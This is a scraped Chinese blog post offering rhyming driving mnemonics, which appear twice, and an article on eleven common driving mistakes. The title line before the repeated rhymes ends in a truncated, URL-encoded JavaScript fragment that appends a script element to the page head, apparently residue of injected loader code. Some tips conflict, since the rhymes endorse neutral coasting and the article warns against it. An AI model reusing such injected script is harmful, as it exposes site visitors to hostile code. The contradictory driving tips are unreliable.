注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

xiaopingli24的博客

找啊找啊找朋友,找到一个好朋友,行个礼来握握手,笑喜喜来点点头,你是我的好朋友。

 
 
 

日志

 
 

汽车驾驶口诀大全  

2010-04-21 22:27:24|  分类: 汽车知识 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

汽车驾驶口诀大全 - 晓晚 - xiaopingli24的博客 汽车驾驶口诀大全 - 晓晚 - xiaopingli24的博客汽车驾驶口诀大全 - 晓晚 - xiaopingli24的博客 起动之前先坐稳,车内仪表检查准。 油压电压都稳定,切记调准后视镜。 一拧钥匙一脚油,手脚配合要紧凑。 踩住离合挂倒档,松开手闸向后望。 出库倒车要注意,来往车辆看仔细。 轻踩油门慢离合,平稳启动不熄火。 车身出库快打轮,车尾方向要对准。 车身摆正快回轮,踩住离合刹车稳。 移库倒车要注意,宽窄程度看仔细。 位置狭窄分次移,车身两侧留余地。 拐弯倒车须留意,内侧车身看仔细。 倒车镜中测距离,注意回轮有时机。 调头倒车要安全,不让后轮出边线。 操纵打轮要熟练,防止掉沟出危险。 挂上一档看前方,起车平稳不要抢。 车动加速换二档,逐级增档要流畅。 路面行驶要沉着,思想集中慢行车。 十次肇事九次快,麻痹大意事故来。 路好不开英雄车,路阻不开赌气车。 十分把握七分开,留着三分防意外。 快速反应要敏捷,判断情况要准确。 犹豫不决要误事,优柔寡断失良机。 交通信号要留意,提前减速别忘记。 公路标志看仔细,行车方向要注意。 交叉路口情况杂,车前左右细观察。 交通规章要牢记,出事就在一两米。 并道之前打转向,后视镜里看车辆。 车辆尾随可转向,侧面有车让一让。 躲避打轮要灵活,高速行车把稳舵。 车速慢减要换档,及时减档才正常。 窄道会车靠边行,注意行人随时停。 转弯减速不能急,脚搭刹车别大意。 人多车多别硬挤,不要生气不能急。 手忙脚乱发脾气,一旦出事来不及。 刹车之前挂空档,减速滑行不匆忙。 快道行车有四忌,每条必须要牢记。 一忌超速快行车,二忌压速慢行车。 三忌思想开小差,四忌路口右转弯。 超车之前看车辆,道路畅通左转向。鸣笛加速超车急,猛踩油门别犹豫。 转向减速再回道,后面车辆要关照。 雨天路面视距差,注意减速防侧滑。 雾天能见度太差,宽示灯开防碰擦。 夜间行车麻烦多,身体疲惫别开车。 农村公路比较窄,控制车速不能快。 遇到牲畜别惊吓,不鸣喇叭让一下。 掌握车距很重要,行车安全很有效。 沉着灵活别着急,全凭目测有距离。 车速较快远距离,以防刹车来不及。 出租车后远距离,随时停车要注意。 雨雪雾天远距离,视线不清能见低。 向阳行车远距离,日光强烈太刺激。 停车之前左转向,空档滑行看车辆。 靠近路边把车刹,车一停稳拉手闸。 行车平稳又灵活,精神饱满乐呵呵。 开车死板又着急,头脑紧张傻兮兮。 行车不怕路艰难,胸有成竹避风险。 违章车祸遭大难,痛苦悔恨人心寒。 纵使车流千千万,驰骋万里闯难关。 机智果断保平安,归家团聚尽开颜 。

汽车驾驶口诀大全 - 晓晚 - xiaopingli24的博客cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">起动之前先坐稳,车内仪表检查准。 油压电压都稳定,切记调准后视镜。 一拧钥匙一脚油,手脚配合要紧凑。 踩住离合挂倒档,松开手闸向后望。 出库倒车要注意,来往车辆看仔细。 轻踩油门慢离合,平稳启动不熄火。 车身出库快打轮,车尾方向要对准。 车身摆正快回轮,踩住离合刹车稳。 移库倒车要注意,宽窄程度看仔细。 位置狭窄分次移,车身两侧留余地。 拐弯倒车须留意,内侧车身看仔细。 倒车镜中测距离,注意回轮有时机。 调头倒车要安全,不让后轮出边线。 操纵打轮要熟练,防止掉沟出危险。 挂上一档看前方,起车平稳不要抢。 车动加速换二档,逐级增档要流畅。 路面行驶要沉着,思想集中慢行车。 十次肇事九次快,麻痹大意事故来。 路好不开英雄车,路阻不开赌气车。 十分把握七分开,留着三分防意外。 快速反应要敏捷,判断情况要准确。 犹豫不决要误事,优柔寡断失良机。 交通信号要留意,提前减速别忘记。 公路标志看仔细,行车方向要注意。 交叉路口情况杂,车前左右细观察。 交通规章要牢记,出事就在一两米。 并道之前打转向,后视镜里看车辆。 车辆尾随可转向,侧面有车让一让。 躲避打轮要灵活,高速行车把稳舵。 车速慢减要换档,及时减档才正常。 窄道会车靠边行,注意行人随时停。 转弯减速不能急,脚搭刹车别大意。 人多车多别硬挤,不要生气不能急。 手忙脚乱发脾气,一旦出事来不及。 刹车之前挂空档,减速滑行不匆忙。 快道行车有四忌,每条必须要牢记。 一忌超速快行车,二忌压速慢行车。 三忌思想开小差,四忌路口右转弯。 超车之前看车辆,道路畅通左转向。鸣笛加速超车急,猛踩油门别犹豫。 转向减速再回道,后面车辆要关照。 雨天路面视距差,注意减速防侧滑。 雾天能见度太差,宽示灯开防碰擦。 夜间行车麻烦多,身体疲惫别开车。 农村公路比较窄,控制车速不能快。 遇到牲畜别惊吓,不鸣喇叭让一下。 掌握车距很重要,行车安全很有效。 沉着灵活别着急,全凭目测有距离。 车速较快远距离,以防刹车来不及。 出租车后远距离,随时停车要注意。 雨雪雾天远距离,视线不清能见低。 向阳行车远距离,日光强烈太刺激。 停车之前左转向,空档滑行看车辆。 靠近路边把车刹,车一停稳拉手闸。 行车平稳又灵活,精神饱满乐呵呵。 开车死板又着急,头脑紧张傻兮兮。 行车不怕路艰难,胸有成竹避风险。 违章车祸遭大难,痛苦悔恨人心寒。 纵使车流千千万,驰骋万里闯难关。 机智果断保平安,归家团聚尽开颜 。

开车最常犯的11个致命错误······

                误区一:轿车二档起步
     轿车变速器设计偏重于速度。如果勉强用二档起步不仅会增加发动机的负荷,而且会导致离合器早期磨损,所以轿车无论排量多少,都应一档起步。
                   误区二:加档超车
        驾车者普遍认为高档位速度较快,所以在超车途中升上一档。事实上车辆的前进一定是靠引擎所发挥的扭力,高档位扭力较小,油门反应迟钝,加速度反而减慢,所以正确超车应该减慢一档,自动波只须将油门踩到底,变速器便会降低一档,以提供足够的扭力。
                   误区三:转弯同时刹车
      转弯时汽车重心移向外侧,此时刹车会加重侧倾,造成单边制动,若速度过快,或刹车过猛,则有翻车危险。正确做法应在进入弯道前减低车速换入低挡,入弯后,缓慢加油车身才能保持平稳姿态。
                   误区四:反手打方向盘
        老款汽车中,方向盘较重,反手打方向盘比较省力,而新款汽车这样操作比较危险,反手打方向时,若车轮轧到障碍物会突然反跳,手腕会受到严重伤害,所以要养成良好的习惯(一般左手放9或10点位置,右手对应放3点或2点位置,一只手上推、另一只手就下拉的方式接力转动方向盘),不要交叉手,反手打方向盘。
                    误区五:先踩离合器后刹车
        有人认为刹车前应切断动力,刹车会更有效,这是严重的错误。因为踩下离合器,发动机转速迅速降低到怠速,合进气管总的真空度降低,真空助力器的辅助力大大降低,刹车距离反而变长。正确的操作,应先踩下刹车,当车速降低至接近停止时再踩下离合器。
                     误区六:下坡空档滑行
      有些车主在下坡时,为图方便,就挂空档滑行,仅以刹车来控制速度,这肯定存在危险隐患,如果是在一个长距离坡位这样做的话,刹车系统会因过热而突然失灵,导致事故发生。正确的做法是根据实际车速挂上合适的档位,让发动机制动,偶尔辅以刹车,这样既安全又延长刹车的寿命。
                    误区七:放空档可以省油
      化油器车放空档是可以省油,但是电喷车则不一定省油,因为有些车在加速中松开油门,喷油系统停止供油,当发动机转速降至2000转时恢复供油,所以电喷车高速带档滑行时会省油,放空档反而费油。
                    误区八:磨合期车速越慢越好
    磨合期是要一段时间内将摩擦部件的配合间隙磨到一个合理的范围,才能实现较好的润滑。若磨合期发动机转速过低,则曲轴连杆轴瓦承受的冲击较大,转速过高则汽缸壁容易拉伤,造成早期磨损,所以磨合期应参照发动机转速而不是车速,汽油发动机转速在2000-3000转之间,柴油发动机在1000-2000转之间。
                   误区九:高档位小油门比较省油
       这种做法发动机易发生爆震,燃油爆发的力量不能完全做功,并冲击连杆机构,造成早期磨损,则于低转扭力不足,加速无力,反而耗油会有增高的可能,最佳的节油而又保护发动机的方式是在最大扭矩转速偏低的区域工作可能得到最大的动力和最好的节油效果。
                     误区十:汽车启动预热10分钟
汽车启动前预热,能使机械部件得到较好润滑,减少摩擦,延长使用寿命。但预热时间不宜过长,能使润滑油到达所需润滑部位即可,一般建议5-8秒。时间过长,只会造成油耗和发动机磨损大。自动波的车,让车从启动时的转速降到800转左右较适宜,当然老手从声音可以听出来。
                     误区十一:抗磨剂可延长机油寿命
       抗磨剂抗磨性能越好,抗氧化性却越弱,使用量越多反而机油受损越大。

  评论这张
 
阅读(505)| 评论(36)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017